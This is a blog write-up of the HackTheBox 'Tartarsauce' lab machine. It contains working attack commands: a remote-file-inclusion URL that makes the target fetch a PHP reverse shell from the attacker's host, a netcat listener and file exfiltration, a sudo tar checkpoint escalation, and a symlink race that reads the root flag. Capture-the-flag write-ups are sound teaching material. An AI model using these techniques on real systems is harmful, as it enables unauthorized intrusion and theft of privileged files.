HackTheBox – Tartarsauce Writeup

This box was really a fun one. because its a proper CTF box with lots of red hearings. so lets begin with nmap scan.

root@kali:~# nmap -sC -sV 10.10.10.88 -T4
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-09 23:57 IST
Nmap scan report for 10.10.10.88
Host is up (0.24s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

we have port 80 open which is a good option for starting enumeration. we find quite a lot of good info for enumeration . it was found after a painful amount of time enumerating monstra 3.0.4 service with default credentials , and then to find out it was a rabbit hole!

We move our enumeration onto the webservices sub site with gobuster.

go run main.go -u http://10.10.10.88/webservices -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 20

we find an interesting finding :

wordpress hosted at : http://10.10.10.88/webservices/wp/

we quickly enumerate more on wordpress site using wpscan along with enumerate plugin option.

wpscan -u http://10.10.10.88/webservices/wp/ –enumerate p

from initial results , it was found not to be vulnerable to any LFI, RFI or remote shell. Another quick red hearing! , author has forged the version of the plugin “gwolle-gb – v2.3.10″ even though it is of lower version which is vulnerable to ,

https://www.exploit-db.com/exploits/38861/

to trick the wordpress scanner.

using this exploit, we create and host a php reverse shell from pentest monkey on our attacker box and use the RFI bug to execute this exploit like this:

http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.13:8000/prs

problem here is with the application not restricting inclusion of a remote script in this case, its our reverse shell from our attacker box.

anddd we have our netcat listener catch a shell :

root@kali:~# nc -nlvp 443
listening on [any] 443 …
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.88] 38966
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
13:14:44 up 13:19, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$ whoami
www-data

 

but still we are not even a proper user on this box to read user flag.

we enumerate more , to find some unusual priv esc loophole :

www-data@TartarSauce:/home$ sudo -l

User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar

so we can run tar binary as onuma user. we can priv esc to onuma user using the tar command as follows :

sudo -u onuma tar cf /dev/null /tmp/exploit –checkpoint=1 –checkpoint-action=exec=/bin/bash

tar: /tmp/exploit: Cannot stat: No such file or directory
onuma@TartarSauce:/tmp$

anddd we are onuma user. quickly grab the flag and buckle up. because real fun starts now!

we run our basic enumeration on the box. for possible priv esc vectors.

we find a systemd timer thats interesting :

[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES

Thu 2018-09-13 02:27:36 EDT 3min 14s left Thu 2018-09-13 02:22:36 EDT 1min 45s ago backuperer.timer backuperer.service

we have a custom systemd service file named backuper.service which runs for every 5 mins.

from the content of the service file it is found out it further invokes a binary named “backuperer

onuma@TartarSauce:~$ cat /lib/systemd/system/backuperer.service

[Unit]
Description=Backuperer

[Service]
ExecStart=/usr/sbin/backuperer

running the binary, which in turn points to /var/backups where backups are created.

we find few interesting files under this,

-rw-r–r– 1 onuma onuma 11511663 Sep 13 02:42 onuma-www-dev.bak
-rw-r–r– 1 root root 15693 Mar 9 2018 onuma_backup_error.txt
-rw-r–r– 1 root root 219 Sep 13 02:42 onuma_backup_test.txt

we can understand that this backuperer binary is backing up website every five minutes. and after a quick check with onuma_backup_error.txt,

we find out that it prints out a difference of the file if the integrity check fails(we will come back to this soon).  example difference is shown below.

Integrity Check Error in backup last ran : Fri Mar 9 13:12:49 EST 2018
————————————————————————
/var/tmp/.ad6461410d5752be98ad3f884a48cd3f95f930a0
Only in /var/www/html/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha: ȜӎŗgͷͼȜ_5h377

lets get the binary to our attacker box for further analysis . we use netcat for file transfer from remote system as follows.

on attacker box :   nc -nlvp 1234 > backuper

on victim box :    nc -w 3 -nv 10.10.14.5 1234 < /usr/sbin/backuperer
Connection to 10.10.14.5 1234 port [tcp/*] succeeded!

running strings command on the binary reveals the source code of the binary , which is a plain bash file.

root@kali:~# strings backuper
#!/bin/bash
#————————————————————————————-
# backuperer ver 1.0.2 – by
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#————————————————————————————-
# Set Vars Here
basedir=/var/www/html #not writable
bkpdir=/var/backups #not writable
tmpdir=/var/tmp # this is writable and interesting
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d’ ‘ -f1)
check=$tmpdir/check

/* snipped */

# Backup onuma website dev files.

/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
/usr/bin/diff -r $basedir $check$basedir

#/usr/bin/diff -r /var/www/html /var/tmp/check/var/www/html
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $”$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n” >> $errormsg
integrity_chk >> $errormsg
exit 2
/* snipped */

 

highlighted part is of our  interest, as the binary takes the backup of the web directory and stores it in  a temp directory and goes to sleep for 30 seconds. after 30 seconds , it calls for integrity_check function which checks for the difference in any of the files content between current web directory and the temporary backed up directory. if difference is found it prints the difference in the content to error file which was previously shown.

We can use this to steal content of privileged files owned by root as diff command follows symbolic link, we get content of files such as shadow file and what not! but we will steal root flag since its the file of our interest.

so lets begin! we have to remember if we fail to change content of the file in 30 seconds when the binary is called , we have to wait another 5 mins to re execute our strategy.

first, create a  test file as www-user and write junk values or random values into it,

touch /var/www/html/test.txt

echo “abc” > test.txt

Next,  once backup starts , we have 30 seconds to remove the old file and add new one with symbolic link to /root/root.txt

so in 30 seconds window,

ln -s  /root/root.txt   /var/www/html/test.txt

now if we go back to the /var/backups and view the onuma_backup_error.txt file! we can see our root flag !

cat /var/backups/onuma_backup_error.txt 

————————————————————————
Integrity Check Error in backup last ran : Thu Sep 13 08:43:32 EDT 2018
————————————————————————
/var/tmp/.1fb6cf3c3d4b97fb3bf095b660d6da6d2ee309f1
diff -r /var/www/html/test.txt /var/tmp/check/var/www/html/test.txt
1c1
< <contents of root flag>> #THIS IS ROOT FLAG 😀

> abc

we got the root flag Woot Woot 🙂 hope you enjoyed this walkthrough . stay tuned for the next write up .   shubha dina! 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *